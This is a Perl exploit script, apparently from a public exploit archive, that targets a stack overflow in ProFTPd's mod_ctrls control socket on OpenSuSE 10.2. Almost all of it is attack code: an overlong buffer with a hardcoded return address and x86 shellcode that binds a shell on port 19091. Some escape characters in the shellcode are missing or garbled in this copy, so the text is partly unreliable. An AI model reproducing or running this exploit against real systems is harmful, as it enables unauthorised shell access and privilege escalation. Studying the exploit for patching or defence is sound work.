proftpd-mod_ctrls-opensuse10_2.pl.txt
Posted on 12 October 2009
#!/usr/bin/perl -w # # Exploit for the ProFTPd mod_ctrls vulnerability. # Stack Overflow in function # int pr_ctrls_recv_request(pr_crls_cl_t *cl) # unchecked buffer for arguments of the module # # connects to the unix domain socket and sends a string # that is longer than the buffer (char[512]). # # Cheers to Alfredo "revenge" Pesoli for the implementation # on Ubuntu and Debian Etch # # works on OpenSuSE 10.2 on i686 # # http://www.devtarget.org # Michael Domberg # # Usage: $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /path/to/local/socket # # Example (on OpenSuSE 10.2): # $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /usr/local/var/proftpd/proftpd.sock # ############################### use strict; use Socket; # bind on port 19091 my $shell = "x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80". "x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80". "x89xc7x31xc9x66xb9x4ax93x52x66x51x43x66x53x89xe1". "xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd". "x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3". "x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88". "x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d". "x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68"; print "[+] Preparing attack string... "; my $rsock = shift; my $buf = "A"x520; use constant TEMPSOCK => '/tmp/tmp.sock'; $buf = $buf."��x0axff"."AAAAaaaaAAAAaaaa"."x77xe7xffxff".$shell; my $l = length($buf); print "[+] Opening Unix Domain Socket to mod_ctrls "; socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "[-] Socket creation failed : $!"; my $rfile = sockaddr_un($rsock); unlink TEMPSOCK; my $lfile = sockaddr_un(TEMPSOCK); bind (SOCK, $lfile) or die "[-] Creation of Unix Domain Socket failed. ($lfile)"; chmod (00700, TEMPSOCK); connect (SOCK, $rfile) or die " [-] Connection to control socket failed. "; print "[+] Sending attack... "; send SOCK, pack("s2", 0),0; send SOCK, pack("s2", 1,0),0; send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0; send SOCK, $buf,0; close SOCK; print " [+] Attack String sent. Try to connect to Port 19091 ";
